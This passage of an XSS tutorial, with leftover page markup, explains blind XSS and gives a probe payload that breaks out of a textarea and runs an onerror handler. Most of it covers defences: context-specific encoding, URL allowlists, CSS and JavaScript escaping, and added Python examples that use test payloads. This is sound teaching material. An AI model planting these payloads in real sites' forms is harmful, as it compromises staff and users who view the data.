break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 
0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">05</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">Blind XSS</strong></p></section></section></section></section></section></section><p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">"Sighted" attack: the output point is known, so the attack code can be adjusted step by step.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">"Blind" attack: the output point is unknown and can only be guessed at.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; 
padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">"Blind XSS" is just a conventional term: without knowing whether the back end has any XSS vulnerability at all, the attacker submits XSS code regardless in places such as message boards and feedback forms, trying as many XSS payloads and payload forms as possible. That is what is called blind XSS.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">"Blind XSS" refers to the situation in which the attacker does not know the back-end interface where submitted data will be displayed, and the site accepts data into which the attacker has inserted XSS code with a real attack function (usually a script tag that loads remote JS). When that unknown back end displays the submitted data without filtering it, the XSS fires as back-office staff operate on it, carrying out the attacker's prepared "real attack function".</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">Put simply: prepared XSS code, usually a script tag that loads remote JS, is entered into every input box in sight; when back-office staff review the submitted data and click on it, the payload fires and valuable information is obtained.</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica 
Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H611941.png" title="XSS漏洞挖掘之跨站脚本攻击(图8)" alt="XSS漏洞挖掘之跨站脚本攻击(图8)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H623630.png" title="XSS漏洞挖掘之跨站脚本攻击(图9)" alt="XSS漏洞挖掘之跨站脚本攻击(图9)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Common output scenarios</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">1. 
[output point]</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">2.<input type="text" value=" [output point] "></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">3.<textarea> [output point] </textarea></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">Taking all of these cases into account, the XSS probe is constructed as:</p></section><p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word 
!important;">&quot;&#39;></textarea><img src=1 onerror=alert(1)></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 
100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">06</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; 
overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">XSS漏洞防御</strong></p></section></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">输入校验:长度限制、值类型是否正确、是否包含特殊字符。其实校验是对数据无害的,满足就放行,不满足就阻止,这样也能保证数据的原生态。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">输出编码:根据输出的位置进行相应的编码,如HTMl编码、Javascript编码、URL编码。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; 
box-sizing: border-box; overflow-wrap: break-word !important;">具体对策</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 1px; border-style: none; border-color: rgb(76, 68, 71); overflow: hidden; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 3px 5px 3px 20px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-color: rgb(231, 59, 112);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; 
overflow-wrap: break-word !important; font-size: 14px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">6.1</strong></p></section></section></section></section><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: top; width: auto; flex: 100 100 0%; border-width: 0px; height: auto; box-shadow: rgb(0, 0, 0) 0px 0px 0px; align-self: flex-start;"><section powered-by="xiumi.us" style="margin: 3px 0px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 15px; line-height: 1.5; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">进入HTML标签之间时</strong></span></p></section></section></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 
For example, between <span></span>, the HTML encoding conversion rules are:

& --> &amp;
< --> &lt;
> --> &gt;
" --> &quot;
' --> &#x27;
/ --> &#x2F;
6.2 When output lands in an ordinary HTML attribute value

Ordinary attributes such as value, width, height, etc.

<div attr=[output]>...</div>    attribute value not enclosed in quotes
<div attr="[output]">...</div>  attribute value enclosed in quotes

If the attribute value is enclosed in single or double quotes, it is enough to HTML-encode the single and double quotes. If it is not quoted, the situation is far more complicated, because the parsing behaviour of each browser has to be taken into account, so it is strongly recommended to enclose attribute values in quotes.
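The following is an added example, not code from the original article: the encoding table from 6.1 implemented as a single-pass translation, then applied in the two positions 6.2 contrasts (between tags, and inside a quoted or an unquoted attribute value). A small HTMLParser probe shows what a parser makes of each rendering; the helper names and the constructed inputs PAYLOAD and SPACED are assumptions of the example.

```python
import html
from html.parser import HTMLParser

# Added example (not code from the article). Section 6.1's encoding table
# implemented as a single-pass translation, then used in the two output
# positions section 6.2 contrasts: between tags, and inside a quoted or an
# unquoted attribute value. An HTMLParser probe shows what a parser makes of
# each rendering.
HTML_ENCODE_TABLE = str.maketrans({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2F;",
})


def html_encode(value: str) -> str:
    """Encode the six characters from the table. str.translate maps each
    character exactly once, so '&' in the input never gets double-encoded."""
    return str(value).translate(HTML_ENCODE_TABLE)


def render_text(user_input: str) -> str:
    """6.1: output between tags."""
    return f"<span>{html_encode(user_input)}</span>"


def render_quoted_attr(user_input: str) -> str:
    """6.2, recommended: quoted attribute value."""
    return f'<input value="{html_encode(user_input)}">'


def render_unquoted_attr(user_input: str) -> str:
    """6.2, discouraged: unquoted attribute value. Encoding the six
    characters is not enough here, because whitespace already ends the
    value and starts a new attribute."""
    return f"<input value={html_encode(user_input)}>"


class _Probe(HTMLParser):
    """Collects every start tag with its attributes, i.e. roughly what a
    browser would build from the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup: str):
    probe = _Probe()
    probe.feed(markup)
    probe.close()
    return probe.tags


def differs_from_stdlib(value: str) -> bool:
    """The article's table differs from html.escape(quote=True) only in
    encoding '/', which the standard library leaves alone."""
    return html_encode(value) != html.escape(value, quote=True)


# Constructed sample inputs: the article's own probe string, and a value
# containing a space, which is the case that breaks unquoted attributes.
PAYLOAD = "\"'></textarea><img src=1 onerror=alert(1)>"
SPACED = "hello title=x"

if __name__ == "__main__":
    for renderer in (render_text, render_quoted_attr, render_unquoted_attr):
        print(renderer.__name__, parse_tags(renderer(SPACED)))
    print(parse_tags(render_text(PAYLOAD)))
```

Running it shows the point of the quoting advice: with the quoted attribute the parser sees one input element whose value is the whole string, while the unquoted form turns "hello title=x" into two attributes, and the article's probe string into an onerror attribute on the element, even though every character from the table was encoded.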
6.3 When output lands in a special HTML attribute value

Special attributes such as href, src, action, etc.

Output into these attributes needs particular care: it is easy to miss a rule, so in this case it is recommended to use an allowlist to restrict what the attribute may do.
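An added example of the allowlist approach for href/src/action values (not code from the article): the URL is accepted only if it is relative or its scheme is on a permitted list, and is then encoded for a quoted attribute with the standard library encoder. The scheme list, the placeholder value and the function names are assumptions of the example.

```python
import html
from urllib.parse import urlsplit

# Added example (not code from the article): an allowlist for values that
# end up in href/src/action, as section 6.3 recommends. A URL is kept only
# if it is relative or its scheme is on the list; anything else becomes a
# fixed placeholder. The scheme list and placeholder are assumptions for
# this example.
ALLOWED_SCHEMES = {"http", "https", "mailto"}
PLACEHOLDER = "#"

# Browsers drop tab, newline and other ASCII control characters from a URL
# before working out its scheme, so the check normalises the same way;
# otherwise it could read a different scheme than the browser does.
_CONTROL_CHARS = {c: None for c in range(0x20)}
_CONTROL_CHARS[0x7F] = None


def normalise_url(raw: str) -> str:
    return raw.strip().translate(_CONTROL_CHARS)


def safe_url(raw: str) -> str:
    url = normalise_url(raw)
    if not url:
        return PLACEHOLDER
    scheme = urlsplit(url).scheme          # urlsplit lower-cases the scheme
    if scheme == "":
        # Relative reference: "/path", "page.html", "?q=1", "#top". Note a
        # protocol-relative "//host/x" also lands here and inherits the
        # page's scheme; reject it separately if only same-origin links
        # are wanted.
        return url
    return url if scheme in ALLOWED_SCHEMES else PLACEHOLDER


def render_link(raw_href: str, text: str) -> str:
    """Allowlist first, then encode for a quoted attribute with the standard
    library encoder, which is the 'use the framework's encoder' advice from
    the article's closing section."""
    return (f'<a href="{html.escape(safe_url(raw_href), quote=True)}">'
            f"{html.escape(text)}</a>")


if __name__ == "__main__":
    for raw in ("https://example.com/a?b=1", "/relative/path", "javascript:alert(1)"):
        print(repr(raw), "->", render_link(raw, "link"))
```

The allowlist is deliberately short: every scheme not named is rejected, so new URL schemes are safe by default, which is the opposite of a blocklist that has to be updated whenever a new dangerous scheme appears. The normalisation step matters because a check that sees a scheme the browser does not (or vice versa) is worse than no check at all.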
6.4 When output lands in CSS

CSS is parsed very loosely. When filtering the value of a specific CSS property, for example the value of width, avoid letting the special characters ", ', ;, }, {, ( and ) through.

If users are allowed to supply complete custom CSS, the javascript: pseudo-protocol, expression, @import and similar constructs must be filtered out; note also how expression handles full-width characters under IE6.
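An added example for the two CSS cases above (not code from the article): a single property value such as width is accepted only against a strict allowlist pattern, which excludes the listed characters by construction, and a full user stylesheet is normalised (NFKC folding of full-width letters, comment removal, lower-casing) before the constructs the article names are looked for. The unit list, the function names and the constructed test strings are assumptions of the example.

```python
import re
import unicodedata

# Added example (not code from the article) for the two cases section 6.4
# distinguishes. Case 1: a single property value such as width. Instead of
# scanning for the characters the article lists, accept only a strict
# allowlist pattern, which excludes those characters by construction. Case 2:
# a full user-supplied stylesheet, where the constructs the article names
# must be rejected after normalising the text.

# Length or percentage: optional sign, number, optional unit. The unit list
# is an assumption for this example; extend it for your property.
_LENGTH_RE = re.compile(r"-?(?:\d+|\d*\.\d+)(?:px|em|rem|%|vw|vh)?")
CSS_FORBIDDEN_CHARS = set("\"';}{()")


def safe_css_length(value: str, default: str = "auto") -> str:
    """Case 1: return the value only if it is a plain CSS length, else a
    fixed default."""
    value = value.strip()
    return value if _LENGTH_RE.fullmatch(value) else default


def has_forbidden_css_chars(value: str) -> bool:
    """The article's character blocklist, kept for comparison: anything
    the allowlist accepts also passes this check, but not the reverse."""
    return any(c in CSS_FORBIDDEN_CHARS for c in value)


_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
_BANNED_TOKENS = ("expression", "@import", "javascript:")


def normalise_css(css: str) -> str:
    """Bring the stylesheet into a canonical form before checking it:
    NFKC folds full-width letters to ASCII (the IE6 'expression' remark in
    the article), comments are removed because they can split a keyword,
    tabs/newlines are dropped and the rest is lower-cased."""
    css = unicodedata.normalize("NFKC", css)
    css = _COMMENT_RE.sub("", css)
    css = re.sub(r"[\t\r\n\f]", "", css)
    return css.lower()


def user_css_is_clean(css: str) -> bool:
    """Case 2: reject a full stylesheet that contains any banned token."""
    text = normalise_css(css)
    return not any(token in text for token in _BANNED_TOKENS)


if __name__ == "__main__":
    for v in ("120px", "50%", "100px; color:red"):
        print(repr(v), "->", safe_css_length(v), "| forbidden chars:", has_forbidden_css_chars(v))
    print(user_css_is_clean("a { color: red; width: 10px }"))
    print(user_css_is_clean("a { width: exp/**/ression(alert(1)) }"))
```

The allowlist for a single value is the stronger of the two checks: it never needs updating when a new dangerous character or keyword turns up. The token blocklist for full stylesheets is only as good as its normalisation, which is why the comment stripping and NFKC folding come before the comparison.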
6.5 When output lands in JavaScript

This is the most complex case. The filtering strategy is best decided from the actual environment, and the three encoding forms of JS must be kept in mind.

Real-world practice

In practice we usually do not need to filter character by character as described above, because most language frameworks already ship a relatively mature XSS defence that only needs to be called; implementing your own filtering function is not recommended.

As long as we know clearly every step from the user's input to the final output, and make sure the output is safe at the point where it is finally written, we can defend against more than 99% of XSS attacks.

· As developers and IT operations staff, we need a certain level of security awareness: when writing a piece of code, think about its security from the attacker's point of view.
· As security staff, think from the developer's point of view, infer the developer's logic, look for defects and exploit them.
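An added example for the JavaScript case in 6.5 and the framework advice above (not code from the article): data is placed inside an inline script by using the standard library JSON encoder as the "framework" encoder, with the \uXXXX form of JS escaping applied on top for the characters that matter at the HTML/JS boundary. The naive form is shown beside it for contrast. The function names and the constructed SAMPLE dictionary are assumptions of the example.

```python
import json

# Added example (not code from the article). Section 6.5: data placed
# inside an inline <script>. Rather than a hand-written filter, the
# standard library JSON encoder is used as the "framework" encoder the
# article recommends, with the \uXXXX form of JS escaping on top for the
# characters that matter at the HTML/JS boundary.


def js_literal(value) -> str:
    """Serialise `value` as a JavaScript literal safe to embed in a <script>.
    json.dumps already escapes quotes, backslashes and control characters;
    ensure_ascii=True turns every non-ASCII character, including the JS line
    terminators U+2028/U+2029, into \\uXXXX. We additionally \\u-escape < > &
    so the data can never contain a literal "</script>" (or an HTML comment
    opener) that the HTML parser would act on before the JS engine runs."""
    encoded = json.dumps(value, ensure_ascii=True)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_script(config: dict) -> str:
    """Hardened form."""
    return "<script>var config = " + js_literal(config) + ";</script>"


def render_script_naive(config: dict) -> str:
    """'Before' form: json.dumps alone. Valid JS, but a "</script>" inside
    the data still ends the element as far as the HTML parser is concerned,
    because the HTML parser runs before the JS engine ever sees the string."""
    return "<script>var config = " + json.dumps(config) + ";</script>"


def round_trips(value) -> bool:
    """\\u escapes are valid JSON too, so decoding gives the original value
    back: encoding changed the representation, not the data."""
    return json.loads(js_literal(value)) == value


# Constructed sample: a name field that tries to close the script element,
# and a note with a U+2028 line separator and an ampersand.
SAMPLE = {"name": "</script><script>alert(1)</script>", "note": "a\u2028b & c"}

if __name__ == "__main__":
    print(render_script_naive(SAMPLE))
    print(render_script(SAMPLE))
```

The two renderings differ only in how the data is written, not in what the script receives: round_trips confirms the decoded value is unchanged, while the hardened markup contains exactly one "</script>", the real closing tag. This is the "know every step from input to output" rule applied to one concrete sink: the value crosses an HTML boundary and then a JS boundary, and the encoding has to satisfy both.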
